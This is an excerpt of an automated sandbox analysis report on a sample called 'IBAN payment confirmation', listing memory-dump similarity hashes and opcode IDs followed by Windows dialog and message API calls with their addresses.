                                                                                                                              • Instruction Fuzzy Hash: 9CC1B178E01218CFEB54DFA9C990B9DBBB2BF89300F5081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 57aa4396427e366c0cccaf311f5342feebf9778453a633e47aa2696218ce88db
                                                                                                                              • Instruction ID: 2273835019de57575130842732a9b193f05e4411c606ca46f7eaaec72ef2d420
                                                                                                                              • Opcode Fuzzy Hash: 57aa4396427e366c0cccaf311f5342feebf9778453a633e47aa2696218ce88db
                                                                                                                              • Instruction Fuzzy Hash: CFC1C178E01218CFEB14DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E86CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e7be96da02af384aec1820b51e7e50ab4cfa929f8de392113e0c2244631ef730
                                                                                                                              • Instruction ID: 1feb4d92abce89d7da1acc0f4182af8ee23fcd43c6d56308d08dc08e1eac13a3
                                                                                                                              • Opcode Fuzzy Hash: e7be96da02af384aec1820b51e7e50ab4cfa929f8de392113e0c2244631ef730
                                                                                                                              • Instruction Fuzzy Hash: 5DC1C378E01218CFEB14DFA5C990B9DBBB2BF89300F5081A9D409AB355DB349E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4ce91b9a5213d156b3f16f00b1f2f3f7c9b8fa400fe85d2a412437dff1b70e58
                                                                                                                              • Instruction ID: 8cd16162827a6b5ba2d9520e90b0bf8e9e7ceac134589c4533b3ce4ebcf647cc
                                                                                                                              • Opcode Fuzzy Hash: 4ce91b9a5213d156b3f16f00b1f2f3f7c9b8fa400fe85d2a412437dff1b70e58
                                                                                                                              • Instruction Fuzzy Hash: 7FC1B278E01218CFEB14DFA5C990B9DBBB2BF89300F5081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6be06c39942c503e85e33e3705d4a49eb7c91729b6bccb41fd32db3777a2c454
                                                                                                                              • Instruction ID: 9844e9a3b46921b868116fba68f68d2b8e433585644f51784b8b24f6eb21f44b
                                                                                                                              • Opcode Fuzzy Hash: 6be06c39942c503e85e33e3705d4a49eb7c91729b6bccb41fd32db3777a2c454
                                                                                                                              • Instruction Fuzzy Hash: DBC1B078E01218CFEB14DFA5C894B9DBBB2BF89300F5081A9D409AB355DB349E86CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 86f469d2a72ca470100ee8fcc3a0888a3efbee2c5e29f5cfd7dddc19b7737e23
                                                                                                                              • Instruction ID: ad2ab5c9ee119ead52321df7dc4144acb3ae7159a5ed1bf7b2258312ae14c62b
                                                                                                                              • Opcode Fuzzy Hash: 86f469d2a72ca470100ee8fcc3a0888a3efbee2c5e29f5cfd7dddc19b7737e23
                                                                                                                              • Instruction Fuzzy Hash: 62C1C178E01218CFEB14DFA5C880B9DBBB2BF89300F5081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a66995e90d9be41ab0adec4c89774c61e6165fd279e947952893cb4ca23d6e10
                                                                                                                              • Instruction ID: 132d6f84015cbc8f03414f89af11fc0e70b4726fc0bd907f9551be5cdfd2a7b2
                                                                                                                              • Opcode Fuzzy Hash: a66995e90d9be41ab0adec4c89774c61e6165fd279e947952893cb4ca23d6e10
                                                                                                                              • Instruction Fuzzy Hash: 87C1B278E01218CFEB54DFA5C894B9DBBB2BF89300F5081A9D409AB355DB349E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1f07df7d27f6022f106bfe961674b572a05fef149921d53dcaabb81695ad150a
                                                                                                                              • Instruction ID: aae3c4b85034d638e4591c726ee03d03c2a577f47f2dbe21faa3a0267a301540
                                                                                                                              • Opcode Fuzzy Hash: 1f07df7d27f6022f106bfe961674b572a05fef149921d53dcaabb81695ad150a
                                                                                                                              • Instruction Fuzzy Hash: C3C1C378E01218CFEB14DFA5C894B9DBBB2BF88300F5081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7122e0fa442fef3801b954c5a84006ae0981a1fb53f570d21b22ba00339e9866
                                                                                                                              • Instruction ID: 7a5b3967c3fde74c481ce8f7730e63d8baa7de3b90d83a5642893bfb4b601fa5
                                                                                                                              • Opcode Fuzzy Hash: 7122e0fa442fef3801b954c5a84006ae0981a1fb53f570d21b22ba00339e9866
                                                                                                                              • Instruction Fuzzy Hash: 25C1C478E01218CFEB14DFA5C984B9DBBB2BF88300F5081A9D409AB355DB349E85CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 80a98177c818d406b1fa93865611a6a90762f7c160a52925f139794b18113d34
                                                                                                                              • Instruction ID: b23ad73bc4f2a47863d5b5d5e247332625c38b46204bf2e4196b5972ac9f0ade
                                                                                                                              • Opcode Fuzzy Hash: 80a98177c818d406b1fa93865611a6a90762f7c160a52925f139794b18113d34
                                                                                                                              • Instruction Fuzzy Hash: 05C1B078E01218CFEB14DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 17a28394e2a5a779301d9fd40cf0634bf27479936d97c6af92ef51277dad67a3
                                                                                                                              • Instruction ID: f0dc8768b39bdd8468f89f7ddcc2bf88988f6a871c5bc7724fed0091527b27b1
                                                                                                                              • Opcode Fuzzy Hash: 17a28394e2a5a779301d9fd40cf0634bf27479936d97c6af92ef51277dad67a3
                                                                                                                              • Instruction Fuzzy Hash: 8AC1BE74E01218CFEB14DFA9C894B9DBBB2BF89300F6081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d26aa00291f998b54f4709938eb8ec83f7fc1424f56f30ad7a4ca0005cfa6e30
                                                                                                                              • Instruction ID: 67509e1dd1dadb073c9805fd3710f260700a0f21a011a96728f3e31f8654b764
                                                                                                                              • Opcode Fuzzy Hash: d26aa00291f998b54f4709938eb8ec83f7fc1424f56f30ad7a4ca0005cfa6e30
                                                                                                                              • Instruction Fuzzy Hash: 25C1BF74E01218CFEB14DFA5C991B9DBBB2BF89300F6081A9D409AB355DB349E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8173db00629b95e60dab2d592e0132282fd143982dc0005ebf5b9ea06867d8d
                                                                                                                              • Instruction ID: 393cf0622168aac93c891c7dad40bcd3787bb8c91b7c70a3e2cb18e7ef183f84
                                                                                                                              • Opcode Fuzzy Hash: d8173db00629b95e60dab2d592e0132282fd143982dc0005ebf5b9ea06867d8d
                                                                                                                              • Instruction Fuzzy Hash: 14C1B074E01218CFEB14DFA5C894B9DBBB2BF89300F5081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 754528358536806f29bb26e176b599ccf299b1727f30dec4d5331f73e3649dda
                                                                                                                              • Instruction ID: 34a4f106bf6c7e9731bd0c02e930d3f8a6be0547b54ab82a446d088d302a650c
                                                                                                                              • Opcode Fuzzy Hash: 754528358536806f29bb26e176b599ccf299b1727f30dec4d5331f73e3649dda
                                                                                                                              • Instruction Fuzzy Hash: CBC1B174E01218CFEB54DFA9C990B9DBBB2BF89300F6081A9D409AB355DB349E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c40183f5d65b4554691fdc515da543fdd19114692e4394c291734181fd62be0
                                                                                                                              • Instruction ID: c9d9db05a3317849fbce967254d2fa79185f3d415078e1e68150186996ff4cae
                                                                                                                              • Opcode Fuzzy Hash: 6c40183f5d65b4554691fdc515da543fdd19114692e4394c291734181fd62be0
                                                                                                                              • Instruction Fuzzy Hash: ABC1AF74E01218CFEB54DFA5C990B9DBBB2BF89300F6081A9D409AB355DB349E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 593f74c06007fa62934b567c0ebc0201a0d17ffef4e49848808d4385481e91ac
                                                                                                                              • Instruction ID: 817be8b7f624ae30a6507cbd9c5fcf8f32e13f23de16cebacc1d0af9f85cb347
                                                                                                                              • Opcode Fuzzy Hash: 593f74c06007fa62934b567c0ebc0201a0d17ffef4e49848808d4385481e91ac
                                                                                                                              • Instruction Fuzzy Hash: EEC1BF74E01218CFEB54DFA5C990B9DBBB2BF89300F6081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 32a4aa8ce797a8ea8a05c2e22030ac8b93c16f8a5b79de21a09680e84ed5a8f7
                                                                                                                              • Instruction ID: a87ba44048e892f634a00811eb443d6a16ae26de21645f3e6381bd514a6c7da9
                                                                                                                              • Opcode Fuzzy Hash: 32a4aa8ce797a8ea8a05c2e22030ac8b93c16f8a5b79de21a09680e84ed5a8f7
                                                                                                                              • Instruction Fuzzy Hash: 34C1AE74E01218CFEB14DFA9C994BDDBBB2BF89300F6080A9D409AB355DB359A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a166555012100ca1777fe82369df06613ca9e1ee02ee79e926e276de4ec2bdaf
                                                                                                                              • Instruction ID: 940e6e662b27e32864623f50c7443245b5b0dfe91ada8ccacb917caf93022044
                                                                                                                              • Opcode Fuzzy Hash: a166555012100ca1777fe82369df06613ca9e1ee02ee79e926e276de4ec2bdaf
                                                                                                                              • Instruction Fuzzy Hash: 17C1C174E01218CFEB54DFA5C994B9DBBB2BF88300F5081A9D409AB355DB349E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 81231e508aa1b90469536f76466206cbb0994f0c4468c04f8548df69068596d6
                                                                                                                              • Instruction ID: 6c99f2e56ce091a15c1f2746ef0b834adcc8b8ea58b9971d6d835a70b9524283
                                                                                                                              • Opcode Fuzzy Hash: 81231e508aa1b90469536f76466206cbb0994f0c4468c04f8548df69068596d6
                                                                                                                              • Instruction Fuzzy Hash: F7C1AE74E01218CFEB14DFA5C994BDDBBB2BF89300F6081A9D409AB355DB359A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 635c0badbc5c6315cd8e879c550a45fcf4b99529dc7c5c4e06968e99475cb318
                                                                                                                              • Instruction ID: 6e939899370f261cbe4df241561d3e36d6220269bdf10240b62eeb826885924a
                                                                                                                              • Opcode Fuzzy Hash: 635c0badbc5c6315cd8e879c550a45fcf4b99529dc7c5c4e06968e99475cb318
                                                                                                                              • Instruction Fuzzy Hash: 3EC1CF74E01218CFEB14DFA9C895B9DBBB2BF89300F6080A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0b5b843d6fe1bcdcb289ac04ad727928b44378767d233dac6ae5b771f4103656
                                                                                                                              • Instruction ID: 8be8dc00bfdc81b1a5468a051237774361c1c392753bfc5db3fea46a20632277
                                                                                                                              • Opcode Fuzzy Hash: 0b5b843d6fe1bcdcb289ac04ad727928b44378767d233dac6ae5b771f4103656
                                                                                                                              • Instruction Fuzzy Hash: C0C1BE74E01218CFEB14DFA9C891B9DBBB2BF89300F6081A9D409AB355DB349E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 46450a1970c1df5e6e5d1730a30df1dc5a764d0fee54befb49cc1e2f0b05f016
                                                                                                                              • Instruction ID: ebcafc684365d0956659903405d011a57887c8f245b016f8e4b01f2d539f8d8f
                                                                                                                              • Opcode Fuzzy Hash: 46450a1970c1df5e6e5d1730a30df1dc5a764d0fee54befb49cc1e2f0b05f016
                                                                                                                              • Instruction Fuzzy Hash: 4DC1AF74E01218CFEB14DFA9C994B9DBBB2BF89300F6081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e94c7a8a675082c969bf97f02638152cd875cbb8ac896bedacb7b270a7aab12
                                                                                                                              • Instruction ID: 51174a6da4cfbf7943a6bdf3136b2e23bfe5e33e6c6e5863fd324a351ba7ac2d
                                                                                                                              • Opcode Fuzzy Hash: 6e94c7a8a675082c969bf97f02638152cd875cbb8ac896bedacb7b270a7aab12
                                                                                                                              • Instruction Fuzzy Hash: 13C1AE74E01218CFEB14DFA9C891B9DBBB2BF89300F6081A9D409AB355DB349E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4668813e2e4287321e129c732d89d3666f13c355feff77746b28955f71afe92
                                                                                                                              • Instruction ID: 6103a37d9afc38c16a567e82d520a86bfae0af2fc2bfb09a45d08bcfc4e5dd0e
                                                                                                                              • Opcode Fuzzy Hash: d4668813e2e4287321e129c732d89d3666f13c355feff77746b28955f71afe92
                                                                                                                              • Instruction Fuzzy Hash: 62C1BF74E01218CFEB54DFA5C980B9DBBB2BF89300F6080A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8a6c3a522b367f96fc1a856590ceb56dbbf9e66b2aa5e99b2f8b355e4e3c4f6f
                                                                                                                              • Instruction ID: bbf87547542c6489d376d53967c64f97da2bba917c851119bea8a9a7b788a988
                                                                                                                              • Opcode Fuzzy Hash: 8a6c3a522b367f96fc1a856590ceb56dbbf9e66b2aa5e99b2f8b355e4e3c4f6f
                                                                                                                              • Instruction Fuzzy Hash: 19C1BF74E01218CFEB14DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 479174e590095abc3de1497381c6f42008a51c2212f2ade5ed08f68d3ebd23da
                                                                                                                              • Instruction ID: b35f1da1db32b212660106513cb861fde87162ceaf91083716b325957ce42ad2
                                                                                                                              • Opcode Fuzzy Hash: 479174e590095abc3de1497381c6f42008a51c2212f2ade5ed08f68d3ebd23da
                                                                                                                              • Instruction Fuzzy Hash: F7C1AF74E01218CFEB14DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 60d3cf41cb8d8e810cfa8a439a9ef40d327fa2d0cdd90b93abec91a0a1dbaa0e
                                                                                                                              • Instruction ID: fd7406cc8e2d1ec31a6846117c68b23c7e2b48bc972c354ad19628168f60f1b9
                                                                                                                              • Opcode Fuzzy Hash: 60d3cf41cb8d8e810cfa8a439a9ef40d327fa2d0cdd90b93abec91a0a1dbaa0e
                                                                                                                              • Instruction Fuzzy Hash: 89C1AD74E01218CFEB14DFA9C990BDDBBB2BF89300F6081A9D409AB355DB349A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8ad2bd847ee79e15302303b688886fe87c1584fe0ea1c04b8761fba64fee8c97
                                                                                                                              • Instruction ID: 7bc2f6bc343abcdaba73db6e5db63f2286767d27fb8be2fcabd1ade03fe9fe8a
                                                                                                                              • Opcode Fuzzy Hash: 8ad2bd847ee79e15302303b688886fe87c1584fe0ea1c04b8761fba64fee8c97
                                                                                                                              • Instruction Fuzzy Hash: E2C1BE74E01218CFEB54DFA5C980B9DBBB2BF89300F6080A9D409AB355DB349E85DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7ab8be6e97ca6ebade40df30238859645a65772f57d08bbc4956d166f676d909
                                                                                                                              • Instruction ID: a5f8d237cc66b63b95d90ae71a3da70fae74d99170dc00690c955a2cb5df5aee
                                                                                                                              • Opcode Fuzzy Hash: 7ab8be6e97ca6ebade40df30238859645a65772f57d08bbc4956d166f676d909
                                                                                                                              • Instruction Fuzzy Hash: 66C1AE74E01218CFEB14DFA9C994B9DBBB2BF89300F6081A9D409AB355DB359A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2531235973.000000003A200000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A200000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_3a200000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e01823f72dcf82a17b4122537cea703856412fc5d7c79d9dd48b9362bb5ab354
                                                                                                                              • Instruction ID: 323a0d3d01f9b15b496f74c99dd52e92a91b6529569b150a25d2b2bbda725630
                                                                                                                              • Opcode Fuzzy Hash: e01823f72dcf82a17b4122537cea703856412fc5d7c79d9dd48b9362bb5ab354
                                                                                                                              • Instruction Fuzzy Hash: F4D05E34D0021C9BCB20DF98E8403ECF770EB99311F0060A6C05CB7200CB7059958F55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 73edaa03625c7c3cedc4a5b4b2f20b122f389176170e2149db9e714276159680
                                                                                                                              • Instruction ID: bcb38fde1dab9215909b4e93be6c7a221439eda5c4b086c90065499ebd45f7b0
                                                                                                                              • Opcode Fuzzy Hash: 73edaa03625c7c3cedc4a5b4b2f20b122f389176170e2149db9e714276159680
                                                                                                                              • Instruction Fuzzy Hash: A3D09E75D5421CDBDB21DF94D8503ECF770FF99300F1064A5D48CA7210DB705E958A55
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405350
